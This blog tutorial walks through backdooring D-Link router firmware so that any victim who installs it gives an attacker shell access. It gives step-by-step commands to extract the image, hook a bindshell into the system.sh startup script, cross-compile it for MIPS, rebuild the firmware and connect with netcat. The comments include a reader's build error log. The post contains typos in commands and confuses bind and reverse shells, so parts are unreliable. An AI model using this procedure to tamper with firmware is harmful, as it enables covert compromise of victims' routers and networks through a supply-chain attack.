Hack Router Firmware by creating a backdoor | An IOT Attack Tutorial

What if you install new firmware and end up compromising all your router data & settings? Don’t rub your eyes dude, this is easy. So, it is an IoT (Internet of things) attack that enables the attacker to access the shell of your router by creating a backdoor in the router firmware.

Starting with some pre requisites:

  1. Firmware: The program or set of programs that are pre-installed on a hardware device.
  2. Backdoor: It’s like a secret way to some protected place that even allows the unauthorized people to enter without any verification. Talking in terms of computer security, It is very much similar, it is basically a way that bypasses an authentication mechanism by discovering a new way to enter & gain access to a computer resource.
  3. Bindshell: In order to hack some machines, two types of shells are used. In bindshell, the listener port lies on a victim machine so that attacker can connect using that port.
  4. Attify OS: A Linux based operating system preloaded with all the IoT penetration testing tools.  But if you want to use kali Linux or some other Linux you need to have the following tools in it. Get it here

Buildroot: A bootable Linux environment is emulated using a buildroot as it contains the set of files which are basically known as makefiles (which contains all the tasks that need to be executed) along with the required patches for cross-platform compilation. Get it here

Firmware-mod-kit: Basically a firmware kit used to extract and rebuild the firmware and operations related to them. We will be using the DLink firmware that is available in this kit. Get it here

Firmadyne: Firmadyne is basically a firmware emulation and analysis system which is based on linux. Get it here

AttifyOS comes with all required tools.

Summary

We will be creating a backdoor in the firmware so that whenever a user installs it, He/She ends up compromising the router data. There is one dependency, the Victim is required to download the same firmware.

Steps to be followed to infect a firmware:

  • Go to path: /home/oit/tools/firmware-mod-kit and extract your DLink firmware at this location using
Extracting a file in linux
 ./extract-firmware dlink_firmware.bin 
  • After successful extraction, Browse into the root file system. To do so go to /home/oit/tools/firm ware-mod-kit/Dlink_firmware/rootfs using
 cd Dlink_firmware/rootfs/ 
  • You are required to go into etc directory, to do so. First of all, type ‘ls’ for confirmation of right directory and then.
 cd ./etc  

Remember the ’.’ denotes the etc of this firmware not root file system.

Init.d: The subdirectory in the etc directory which have all the start/stop scripts used to initialize the processes.

  • Go to init.d by typing cd init.d
cd ./etc/init.d
  • You need to write ls command with la parameter
how to create a backdoor in firmware
ls -la
  • It contains the path of files needed for initialization. Open system.sh using any text editor, we used nano. Go to etc/script/system.sh and type
sudo nano system.sh
  • After any one of the /etc/ line echo some text, insert your bindshell with an echo command for output.
Hacking a router firmware
echo “Anything as output”
/etc/templates/Bindshell.
  • Bindshell program is Below. Run sudo nano abcd.c. It gives the netcat reverse shell.
  • The C program needs to be compiled using a MIPS architecture’s compiler:
cd tools//binroot-2015.11.1/output/host/usr/bin.
We choose : mipsel-buildroot-linux-uclibc-gcc

Copy  that c program in this folder. and now start compiling the file here.

compile a code using gcc compiler
./mipsel-buildroot-linux-uclibc-gcc abcd.c-static -o Bindshell
  •  Copy the Bindshell you compiled to /etc/templates/ directory.
OWASP TOP10 IOT ATTACKS
  •  Build the firmware, Go to firmware-mod-kit directory.
Hacking a firmware of a router
 ./build-fimrware.sh Dlink_firmware/

Find the file in the Dlink_firmware Directory as “new-fimrware.bin”.

  •  Copy the .bin file to firmadyne directory and now run ./fat.py
Hack a router firmware using Atify OS
Hacking a file system in Kali llinux
  •  Open a new tab in terminal and type
nc <ip_address> <port_no>
Complete tutorial for Firmware hacking using a backdoor

Mission Shell Access Successfull!!

How do email transfer take place? Find out here

4 thoughts on “Hack Router Firmware by creating a backdoor | An IOT Attack Tutorial”

  1. Pingback: How does Search Engine work? Complete Guide to Google Search Engine

  2. Pingback: Buffer Overflow Attack | Working Process, Steps and Mitigation.

  3. Matheus Camara Carvalho

    Hello, how are you ? I’m just trying to extract and reassemble the firmware to test if it really works, but it is giving the following error:

    Would you help me ?

    peixe@peixe-VirtualBox:~/Downloads/firmware-mod-kit-master$ ./build-firmware.sh fmk -nopad -min
    Firmware Mod Kit (build) 0.99, (c)2011-2013 Craig Heffner, Jeremy Collake

    Building new squashfs file system… (this may take several minutes!)
    Squashfs block size is 128 Kb
    Parallel mksquashfs: Using 3 processors
    Creating 4.0 filesystem on /home/peixe/Downloads/firmware-mod-kit-master/fmk/new-filesystem.squashfs, block size 131072.
    [======================================================================================================-] 1065/1065 100%
    Exportable Squashfs 4.0 filesystem, lzma compressed, data block size 131072
    compressed data, compressed metadata, compressed fragments, compressed xattrs
    duplicates are removed
    Filesystem size 14960.85 Kbytes (14.61 Mbytes)
    24.95% of uncompressed filesystem size (59966.50 Kbytes)
    Inode table size 9830 bytes (9.60 Kbytes)
    24.99% of uncompressed inode table size (39338 bytes)
    Directory table size 10813 bytes (10.56 Kbytes)
    46.19% of uncompressed directory table size (23411 bytes)
    Number of duplicate files found 45
    Number of inodes 1153
    Number of files 753
    Number of fragments 115
    Number of symbolic links 193
    Number of device nodes 78
    Number of fifo nodes 0
    Number of socket nodes 0
    Number of directories 129
    Number of ids (unique uids + gids) 1
    Number of uids 1
    root (0)
    Number of gids 1
    root (0)
    ERROR: New firmware image will be larger than original image!
    Building firmware images larger than the original can brick your device!
    Try re-running with the -min option, or remove any unnecessary files.
    REFUSING to create new firmware image.

    Original file size: 17543011
    Current file size: 17551203 (plus footer of 0 bytes)

    Quitting…

Leave a Reply

Your email address will not be published. Required fields are marked *